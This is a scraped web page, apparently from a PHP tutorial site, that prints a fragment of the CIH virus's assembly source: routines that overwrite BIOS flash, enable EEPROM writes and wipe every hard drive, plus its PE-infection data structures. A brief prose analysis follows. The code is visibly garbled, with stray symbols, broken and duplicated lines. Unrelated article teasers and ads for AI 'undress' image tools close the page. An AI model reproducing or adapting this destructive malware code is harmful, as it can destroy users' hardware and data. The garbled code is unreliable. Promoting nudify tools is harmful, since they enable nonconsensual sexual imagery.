Analysis of virus program source code examples-CIH virus[5]
push ecx
loop $
;Destroy the additional 000E0000 - 000E007F segment ROM data in the BIOS, a total of 80h bytes
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $ # pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; Destroy the 000FE000 - 000FE07F segment data of the BIOS, 80h bytes in total
mov ah, 0e0h
mov [eax], al
[esi], 100ch
call esi
; Destroy all hard drives
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2CH
Push 0c0001000H
MOV BH, 08h
Push ebx
Push ECX
Push ECX ## Push Ecx ## Push 40000501h
Push Ecx
# push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
;Destroy the next area
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
Enable EEPROM to write information
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
IOForEEPROM:
@10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al , 44h
ret BCSPath- IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath;The difference between the address of each Vxd call instruction
VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h;The call number of Vxd
VxdCallTableSize = ($-VxdCallIDTable)/04h; Program The number of calls using Vxd
;Definition of virus version and copyright information
VirusVersionCopyright db 'CIH v';Identification of CIH virus
db MajorVirusVersion+'0';Main version number
db '.'
db MinorVirusVersion+'0' ;Minor version number
db ' TATUNG' ;Author name
;Virus size
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections *SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)
; Dynamic data definition
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; Virus data starting address
OnBusy db 0; "Busy" flag
FileModificationTime dd ? File modification time
FileNameBufferSize dup(?) FileNameBufferSize dup(?) DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; Block number
TimeDateStamp dd ? ; File time
SymbolsPointer dd ?
NumberOfSymbols dd ? ; Number of symbols in the symbol table
SizeOfOptionalHeader dw ? ;The length of the optional header
_Characteristics dw ? ;Character set flag
Magic dw ? ;Flag word (always 010bh)
LinkerVersion dw ? ;Linker version number
SizeOfCode dd ? ; Code segment size
SizeOfInitializedData dd ? Initialized data block size
SizeOfUninitializedData dd ? Uninitialized data block size
AddressOfEntryPoint dd ? Program start RVA
BaseOfCode dd ? ; Code Section start RVA
BaseOfData dd ? ;Data section start RVA
ImageBase dd ? ;Load base address RVA
@9 = $
SectionAlignment dd ? ;Block alignment
FileAlignment dd ? ;File block alignment
OperatingSystemVersion dd ? ;Required operating system version number
ImageVersion dd ? ;User-defined version number
SubsystemVersion dd ? ;Required subsystem version number
Reserved dd ? ; Reserved
SizeOfImage dd ? ; Total length of each part of the file
SizeOfHeaders dd ? ; File header size
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = @9
SectionName = StartOfSectionTable ;Block name
VirtualSize = StartOfSectionTable+08h ;Section real length
VirtualAddress = StartOfSectionTable+0ch ;Block RVA
SizeOfRawData = StartOfSectionTable+10h ;Block physical length
PointerToRawData = StartOfSectionTable+14h ; Block physical offset
PointerToRelocations = StartOfSectionTable+18h ; Relocation offset
PointerToLineNumbers = StartOfSectionTable+1ch ; Line number table offset
NumberOfRelocations = StartOfSectionTable+20h ; Number of relocation items
NumberOfLinenNmbers = StartOfSectionTable+22h ; Number of line number tables
Characteristics = StartOfSectionTable+24h ; Block attributes
SizeOfScetionTable = Characteristics+04h-SectionName ; Length of each block table item
## ;Amount of memory required by the virus
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $
VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; ## From the above code analysis process, we can see that the CIH virus has a clear structure and distinct layers. The backbone structure of this virus program is very similar to that of the DOS virus, except that the details of the virus are processed according to the win95 method, and all system calls are made using Vxd. This makes the virus program more low-level, more efficient, and easier to program. Compared with using API functions under Windows, there is no need to consider the complex relocation process of the virus itself; compared with using interrupts, it can better prevent the tracking of the program. analyze.
The CIH virus has two innovations. First, when the virus infects, it searches for the blank areas between the blocks of the infected file, and writes the virus's own various data structures and codes into them (if the blank area is not enough, It is not contagious, which is one of the reasons why some files will not be infected); secondly, the virus can damage the computer hardware when it attacks, not only burning the Flash Memory, but also destroying the hard disk.
For security reasons, we have not given a detailed analysis of this part of the code that causes viruses to attack and damage hardware.
The above is the content of virus program source code example analysis-CIH virus [5]. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!
Working with Flash Session Data in LaravelMar 12, 2025 pm 05:08 PMLaravel simplifies handling temporary session data using its intuitive flash methods. This is perfect for displaying brief messages, alerts, or notifications within your application. Data persists only for the subsequent request by default: $request-
cURL in PHP: How to Use the PHP cURL Extension in REST APIsMar 14, 2025 am 11:42 AMThe PHP Client URL (cURL) extension is a powerful tool for developers, enabling seamless interaction with remote servers and REST APIs. By leveraging libcurl, a well-respected multi-protocol file transfer library, PHP cURL facilitates efficient execution of various network protocols, including HTTP, HTTPS, and FTP. This extension offers granular control over HTTP requests, supports multiple concurrent operations, and provides built-in security features.
Simplified HTTP Response Mocking in Laravel TestsMar 12, 2025 pm 05:09 PMLaravel provides concise HTTP response simulation syntax, simplifying HTTP interaction testing. This approach significantly reduces code redundancy while making your test simulation more intuitive. The basic implementation provides a variety of response type shortcuts: use Illuminate\Support\Facades\Http; Http::fake([ 'google.com' => 'Hello World', 'github.com' => ['foo' => 'bar'], 'forge.laravel.com' =>
12 Best PHP Chat Scripts on CodeCanyonMar 13, 2025 pm 12:08 PMDo you want to provide real-time, instant solutions to your customers' most pressing problems? Live chat lets you have real-time conversations with customers and resolve their problems instantly. It allows you to provide faster service to your custom
Discover File Downloads in Laravel with Storage::downloadMar 06, 2025 am 02:22 AMThe Storage::download method of the Laravel framework provides a concise API for safely handling file downloads while managing abstractions of file storage. Here is an example of using Storage::download() in the example controller:
PHP Logging: Best Practices for PHP Log AnalysisMar 10, 2025 pm 02:32 PMPHP logging is essential for monitoring and debugging web applications, as well as capturing critical events, errors, and runtime behavior. It provides valuable insights into system performance, helps identify issues, and supports faster troubleshoot
Explain the concept of late static binding in PHP.Mar 21, 2025 pm 01:33 PMArticle discusses late static binding (LSB) in PHP, introduced in PHP 5.3, allowing runtime resolution of static method calls for more flexible inheritance.Main issue: LSB vs. traditional polymorphism; LSB's practical applications and potential perfo
How to Register and Use Laravel Service ProvidersMar 07, 2025 am 01:18 AMLaravel's service container and service providers are fundamental to its architecture. This article explores service containers, details service provider creation, registration, and demonstrates practical usage with examples. We'll begin with an ove
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
Zend Studio 13.0.1
Powerful PHP integrated development environment
SublimeText3 Chinese version
Chinese version, very easy to use
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
